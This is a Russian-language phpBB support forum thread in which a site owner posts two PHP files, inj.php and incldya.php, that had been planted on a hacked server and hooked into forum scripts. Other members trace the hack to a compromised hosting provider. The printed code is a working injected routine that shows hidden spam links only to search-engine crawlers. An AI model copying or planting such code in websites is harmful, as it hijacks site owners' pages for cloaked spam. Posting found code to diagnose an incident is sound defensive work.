Взлом. Опять инфобокс. И не только...

Проблемы с установкой или работой phpBB 2.0.x? Ищите ответы здесь!
MaxiStyle
phpBB 1.0.0
Сообщения: 8
Стаж: 18 лет 4 месяца
Откуда: Хабар-Сити

Взлом. Опять инфобокс. И не только...

Сообщение MaxiStyle »

Совершенно случайно на серваке нашёл папку userbin, лежащую на уровень выше корня каталога. Со следующим содержанием.
incldya.php

Код: Выделить всё

<?
$refer=$_SERVER['HTTP_REFERER'];
$refer=strtolower($refer);
if ((strpos($refer, "http") === false))
{
define("LINKS","readme.txt");
if (preg_match('/(?:StackRambler|Yandex[^\)]+[^M]\)|Aport)/i', $_SERVER['HTTP_USER_AGENT'])) {
$data6 = @file (LINKS, $use_include_path = 1);
} else { //if !bot
unset ($data6);
}
$tot23 = @count($data6);
if ($tot23<5) { 
$_otp =" "; 
} else {
srand((float)microtime() * 1000000);
if (IsSet($data6)) {
shuffle($data6);
foreach ($data6 as $link) {
$_otp .= trim($link)."\r\n";
if ($cnt++>5) break;
}// foreach-1
}// if IsSet
$cnt = 0;
}//if <50
}//if refer
echo $_otp;
?>
inj.php

Код: Выделить всё

<?
	global $__inject_level;
	if (empty($__inject_level)) 
	{
		function __inject_shutdown()
		{
			include 'incldya.php';
			flush();
		}

		function __inject_print_sign()
		{
			echo "82347badsh33";
			flush();
		}

		$__inject_level = 1;
		if ($_SERVER['HTTP_USER_AGENT'] != "TeleportPro")
			register_shutdown_function("__inject_shutdown");
		else
			register_shutdown_function("__inject_print_sign");
	}
?>
Решил, что куски какого-то мода. Удалил папку. И что вы думаете... форум выдал ошибку, оказываеться скрипт inj.php подключаеться через следующие скрипты:
config.php
constants.php
album_constants.php
template.php
sessions.php
и ещё с 10 скриптов!

Помогите, разобраться как меня хакнули. Версия форума 2.0.22, обновлял вовремя.
Похожая проблема описана так же здесь http://yarportal.ru/topic21938.html но там народ нисчем не разобрался.
Xpert
phpBB Guru
phpBB Guru
Сообщения: 5484
Стаж: 21 год 1 месяц
Поблагодарили: 2 раза

Сообщение Xpert »

В случае если обновлялись вовремя и вас не взломали раньше, это не phpBB. Для 2.0.22 не существует уязвимостей.

readme.txt приложите пожалуйста (через полную форму ответа).
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
MaxiStyle
phpBB 1.0.0
Сообщения: 8
Стаж: 18 лет 4 месяца
Откуда: Хабар-Сити

Сообщение MaxiStyle »

Xpert
readme.txt не существует в том то и загвоздка, что код практически бессмысленный, а подобная фигня не у меня одного, в инете я натолкнулся на похожие случаи у народа...но никто не знает в чём дело.
Похоже, что уязвимость в модах, а не в форуме...
Рэп, хип-хоп, mp3, видео www.habrap.ru
Xpert
phpBB Guru
phpBB Guru
Сообщения: 5484
Стаж: 21 год 1 месяц
Поблагодарили: 2 раза

Сообщение Xpert »

Очень может быть...
Можно полный список модов?
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
MaxiStyle
phpBB 1.0.0
Сообщения: 8
Стаж: 18 лет 4 месяца
Откуда: Хабар-Сити

Сообщение MaxiStyle »

Xpert
Да конечно:
Advanced Posts Merging 2.1.2
Admin Userlist 1.1.0
Advanced ACP 1.0.0
Photo Album v2 for phpBB2
Anti Bot Question MOD 2.0.1
File Attachment Mod v2
Birthday 1.5.8
Detector Bots 2.0.6
Extended Quick Reply Form 2.3.0
eXtreme Styles mod 2.3.1
First Post On Every Page 1.0.1
Gender 1.2.7
Moderator Ban 1.2.0
Recent Topics 1.0.4

в общем-то и всё...
проверил логи сервака, ничего не нашёл.
с самого сайта такое врядли тоже могли устроить, движок самописный, да и к тому же сам факт того, что я не один такой похаканый уже настораживает!
И всем советую поискать у себя на серваке заветную папочку userbin.
Рэп, хип-хоп, mp3, видео www.habrap.ru
Xpert
phpBB Guru
phpBB Guru
Сообщения: 5484
Стаж: 21 год 1 месяц
Поблагодарили: 2 раза

Сообщение Xpert »

Конкретные версии модов в студию для вот этих
MaxiStyle писал(а):Photo Album v2 for phpBB2
File Attachment Mod v2
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
MaxiStyle
phpBB 1.0.0
Сообщения: 8
Стаж: 18 лет 4 месяца
Откуда: Хабар-Сити

Сообщение MaxiStyle »

Photo Album 2.0.53
File Attachment Mod 2.3.9
Рэп, хип-хоп, mp3, видео www.habrap.ru
Аватара пользователя
edgar
phpBB 2.0.13
Сообщения: 917
Стаж: 19 лет 9 месяцев
Откуда: с Луны свалил...

Сообщение edgar »

Да по ходу это не через phpbb ломают...

*****
тут были примеры взломанных сайтов. удалены.

*****

Посмотрите сколько в кэше гугла и яндекса сайтов с ошибками из-за inj.php и incldya.php в userbin. Полно таких
Cайты без phpbb
Может хостера какого ломанули... (вашего в смысле)

Добавлено спустя 21 минуту 57 секунд:

Все сайты на серваке infobox.org
MaxiStyle ваш тоже

Уязвимость phpbb млин. Ф топку
Последний раз редактировалось edgar 06.04.2007 10:11, всего редактировалось 1 раз.
MaxiStyle
phpBB 1.0.0
Сообщения: 8
Стаж: 18 лет 4 месяца
Откуда: Хабар-Сити

Сообщение MaxiStyle »

Очень интересно.
Я 3 дня назад тоже долбил поисковика, тогда они ничего не нашли, а сегодня попробовал и к списку взломаных добавилось ещё пару сайтов... они все с Инфобокса... буду долбит суппорт.
Спасибо.
Рэп, хип-хоп, mp3, видео www.habrap.ru
Аватара пользователя
natali
phpBB 2.0.1
Сообщения: 293
Стаж: 19 лет 11 месяцев
Откуда: Киев

Сообщение natali »

называйте топик по людски млять

я подумал что в phpBB уязвимость

неужели трудно написать "МЕНЯ хакнули".
MaxiStyle
phpBB 1.0.0
Сообщения: 8
Стаж: 18 лет 4 месяца
Откуда: Хабар-Сити

Сообщение MaxiStyle »

natali писал(а):я подумал что в phpBB уязвимость
ну я ведь тоже так думал!

В общем похоже Инфобокс похакали. Я уже около 20 сайтов похаканых нашёл... Суппорт отписываеться якобы сами мы ламеры...
Тему можно закрывать.
Рэп, хип-хоп, mp3, видео www.habrap.ru
Аватара пользователя
edgar
phpBB 2.0.13
Сообщения: 917
Стаж: 19 лет 9 месяцев
Откуда: с Луны свалил...

Сообщение edgar »

MaxiStyle писал(а):Тему можно закрывать.
Зачем это ее закрывать? Нормальная тема вроде, полезна может быть не только вам и вполне возможно продолжение :)

Только не понимаю, почему вы не исправляете ее название. Название точно не по теме
Аватара пользователя
Sklaz3r
phpBB 1.0.0
Сообщения: 4
Стаж: 19 лет 2 месяца
Откуда: Хабаровск

Сообщение Sklaz3r »

Просто хостера хакнули.
Знакомая проблема...
Сначала <iframe>'ы, потом файлы... :(
MaxiStyle
phpBB 1.0.0
Сообщения: 8
Стаж: 18 лет 4 месяца
Откуда: Хабар-Сити

Сообщение MaxiStyle »

Хостер божиться, что непричём, хотя подтверждает, что взломаны именно его клиенты (по их словам менее 1%). Рекомендует мне провериться на наличие троянов.
Ну включил я AVP5 сканер, ну нихрена он не нашёл (базы новые)...

Вечная проблема: кто виноват и что с этим делать...
Рэп, хип-хоп, mp3, видео www.habrap.ru
Alexalexis
phpBB 1.4.4
Сообщения: 183
Стаж: 18 лет 3 месяца

Сообщение Alexalexis »

MaxiStyle писал(а):Хостер божиться, что непричём, хотя подтверждает, что взломаны именно его клиенты (по их словам менее 1%).
...
Вечная проблема: кто виноват и что с этим делать...
Выводы. :wink:

Вернуться в «Поддержка phpBB 2.0.x»